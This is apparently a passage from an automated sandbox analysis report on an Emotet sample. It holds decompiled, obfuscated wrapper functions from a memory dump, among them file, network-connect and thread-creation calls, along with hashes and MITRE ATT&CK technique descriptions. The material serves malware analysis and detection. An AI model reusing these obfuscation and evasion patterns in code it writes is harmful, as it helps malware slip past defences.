				_v16 = _v16 * 0x3c;
				_v16 = _v16 ^ 0x1b87e59a;
				E031D2309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
				return _t68;
			}

0x031e19a6
0x031e19a7
0x031e19aa
0x031e19ad
0x031e19b0
0x031e19b3
0x031e19b6
0x031e19b9
0x031e19bc
0x031e19bf
0x031e19c3
0x031e19c4
0x031e19c9
0x031e19d3
0x031e19d9
0x031e19dd
0x031e19e4
0x031e19eb
0x031e19f2
0x031e19fe
0x031e1a03
0x031e1a0b
0x031e1a13
0x031e1a16
0x031e1a1d
0x031e1a30
0x031e1a38
0x031e1a3f
0x031e1a4a
0x031e1a4d
0x031e1a60
0x031e1a79
0x031e1a7f

APIs

CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 031E1A79

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction ID: e98287a1baf4195e56b72e85797e773eba42375520742f92b47b8bfd60daf424
Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
Instruction Fuzzy Hash: E621E27280021DBBDF05DF95D8098DEBFB6EF49354F108588FA14662A0D3B69A61AF90

Uniqueness

Uniqueness Score: -1.00%

Function 031F30FB, Relevance: 1.6, APIs: 1, Instructions: 70
networkCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E031F30FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t57;
				signed int _t58;
				short _t63;

				_t63 = _a40;
				_push(_a48);
				_push(0);
				_push(_t63 & 0x0000ffff);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E031F2523(_t63 & 0x0000ffff);
				_a40 = 0x441dde;
				_a40 = _a40 | 0xef6c71fd;
				_a40 = _a40 + 0xffff46ca;
				_a40 = _a40 ^ 0xef65f1b7;
				_v16 = 0x4e992b;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xa64ff1a5;
				_v12 = 0xdc7938;
				_t58 = 0x71;
				_v12 = _v12 / _t58;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x00369a6d;
				_v8 = 0xc2c26;
				_v8 = _v8 << 7;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x30b97202;
				E031D2309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
				return _t57;
			}

0x031f3102
0x031f3106
0x031f310e
0x031f310f
0x031f3110
0x031f3113
0x031f3116
0x031f3117
0x031f311a
0x031f311d
0x031f3120
0x031f3123
0x031f3126
0x031f3129
0x031f312a
0x031f312b
0x031f3130
0x031f313a
0x031f3143
0x031f314a
0x031f3151
0x031f3158
0x031f315c
0x031f3163
0x031f316f
0x031f3177
0x031f317a
0x031f317e
0x031f3185
0x031f318c
0x031f3190
0x031f3194
0x031f31b4
0x031f31ca
0x031f31d1

APIs

InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 031F31CA

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: ConnectInternet
String ID:
API String ID: 3050416762-0
Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction ID: 7ddb37666327316e3ee4e1a36bbe482b596c54ee260236bfc1dfaa616eb3b4b6
Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
Instruction Fuzzy Hash: B9214A76900208BBDF01CFA6CC49CDFBFB9EB89704F008149F92466220C3759A20DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 031E38CA, Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E031E38CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t44;
				void* _t54;
				signed int _t56;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(0);
				E031F2523(_t44);
				_v8 = 0x81d8e3;
				_v8 = _v8 | 0x29cc6377;
				_t56 = 0x4e;
				_v8 = _v8 / _t56;
				_v8 = _v8 + 0xffff28cb;
				_v8 = _v8 ^ 0x008a8115;
				_v20 = 0x37a592;
				_v20 = _v20 | 0x4431b854;
				_v20 = _v20 ^ 0x44318d0b;
				_v16 = 0x83d7ad;
				_v16 = _v16 | 0x0c5d9c08;
				_v16 = _v16 ^ 0x0cde7e94;
				_v12 = 0xac61ec;
				_v12 = _v12 + 0xffff443d;
				_v12 = _v12 * 0x13;
				_v12 = _v12 ^ 0x0cbd13a0;
				E031D2309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
				return _t54;
			}

0x031e38d1
0x031e38d6
0x031e38d7
0x031e38da
0x031e38db
0x031e38de
0x031e38e1
0x031e38e4
0x031e38e7
0x031e38ea
0x031e38eb
0x031e38ed
0x031e38f2
0x031e38fc
0x031e390a
0x031e3912
0x031e3915
0x031e391c
0x031e3923
0x031e392a
0x031e3931
0x031e3938
0x031e393f
0x031e3946
0x031e394d
0x031e3954
0x031e3967
0x031e396f
0x031e3982
0x031e3994
0x031e399a

APIs

CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 031E3994

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction ID: 69bd9a7b6285cd890947be9a3635cea4fa55773880e1d096cc43f12f8a4b3e70
Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
Instruction Fuzzy Hash: FF211475801219BBCF15CFE9DD4A8DFBFB8FF09214F108588F918A6120D3719A219FA0

Uniqueness

Uniqueness Score: -1.00%

Function 031D2985, Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E031D2985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t43;
				void* _t53;
				signed int _t55;
				long _t60;
				long _t61;

				_push(_a12);
				_t60 = __edx;
				_t61 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E031F2523(_t43);
				_v20 = 0x610f25;
				_v20 = _v20 ^ 0x98bdb346;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x13199c72;
				_v16 = 0x24641b;
				_t55 = 0x72;
				_v16 = _v16 * 0x35;
				_v16 = _v16 ^ 0xfebd96de;
				_v16 = _v16 ^ 0xf931a9e3;
				_v12 = 0x6331a9;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 / _t55;
				_v12 = _v12 ^ 0x0006f398;
				_v8 = 0x8145a8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 << 0xd;
				_v8 = _v8 + 0x8268;
				_v8 = _v8 ^ 0x0405b518;
				E031D2309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
				return _t53;
			}

0x031d298d
0x031d2990
0x031d2992
0x031d2994
0x031d2997
0x031d299a
0x031d299b
0x031d299c
0x031d29a1
0x031d29ab
0x031d29b4
0x031d29b8
0x031d29bf
0x031d29cc
0x031d29d3
0x031d29d6
0x031d29dd
0x031d29e4
0x031d29eb
0x031d29f9
0x031d29fc
0x031d2a03
0x031d2a0a
0x031d2a0e
0x031d2a12
0x031d2a19
0x031d2a31
0x031d2a3e
0x031d2a45

APIs

RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 031D2A3E

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction ID: 26100700e50ed095b843dd8d2057f23a641bd254fe02396c814726f4c7bf4824
Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
Instruction Fuzzy Hash: 43215676C00208BBDF18DFA4C80A8DEBFB5FB41710F108098E824A6210D3B46B15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 031E7708, Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 031E77B6

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction ID: fba02444eafedc46956522c8cc8d0f3b0675a274b661fb1d956faced76f191df
Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
Instruction Fuzzy Hash: 8F1137B6D00209BBDB08DFA4C9469EEBBB4FF44304F108589E814AB250D3B49B108F91

Uniqueness

Uniqueness Score: -1.00%

Function 031EA566, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E031EA566(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t31;
				int _t39;

				_push(_a4);
				_push(__ecx);
				E031F2523(_t31);
				_v20 = 0xa80c31;
				_v20 = _v20 * 0x6c;
				_v20 = _v20 ^ 0x46e6f799;
				_v16 = 0x35d7e6;
				_v16 = _v16 << 0xd;
				_v16 = _v16 ^ 0xbafefac0;
				_v12 = 0x55f9ae;
				_v12 = _v12 + 0xffffbfa6;
				_v12 = _v12 | 0xf8d2795e;
				_v12 = _v12 ^ 0xf8daa7f9;
				_v8 = 0xe46cfe;
				_v8 = _v8 ^ 0xeb94df75;
				_v8 = _v8 | 0xf69b0666;
				_v8 = _v8 ^ 0xfffa92dc;
				E031D2309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
				_t39 = FindCloseChangeNotification(_a4); // executed
				return _t39;
			}

0x031ea56c
0x031ea570
0x031ea571
0x031ea576
0x031ea58a
0x031ea58d
0x031ea594
0x031ea59b
0x031ea59f
0x031ea5a6
0x031ea5ad
0x031ea5b4
0x031ea5bb
0x031ea5c2
0x031ea5c9
0x031ea5d0
0x031ea5d7
0x031ea5f6
0x031ea601
0x031ea606

APIs

FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 031EA601

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction ID: b42636f97cfaf1ac714843a3b77a24f57f371399c3838738a61b2eef38947b58
Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
Instruction Fuzzy Hash: 1C11F7B5C1030DFFCB18DFA8D8469AEBBB4EF44304F108598A855A6260D3756B158F91

Uniqueness

Uniqueness Score: -1.00%

Function 031E17CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E031E17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E031F2523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E031D2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x031e17d2
0x031e17d5
0x031e17d7
0x031e17db
0x031e17dc
0x031e17e1
0x031e17e8
0x031e17f1
0x031e17f8
0x031e17ff
0x031e1803
0x031e1807
0x031e180e
0x031e181b
0x031e1822
0x031e1825
0x031e182c
0x031e1833
0x031e1844
0x031e1847
0x031e1859
0x031e185c
0x031e1863
0x031e186a
0x031e186e
0x031e1881
0x031e188d
0x031e1893

APIs

lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 031E188D

Memory Dump Source

Source File: 0000000E.00000002.1180794107.00000000031D0000.00000040.00000001.sdmp, Offset: 031D0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: d65d6e8c3023cc721414b0b71d69c7f6dba9addc0b0c6e7bd3f454979e9868f6
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 322124B5D0020CFFDB08DFA4C94A9EEBBB4EB45304F208189E425B7250E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report dUGnMYeP1C

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets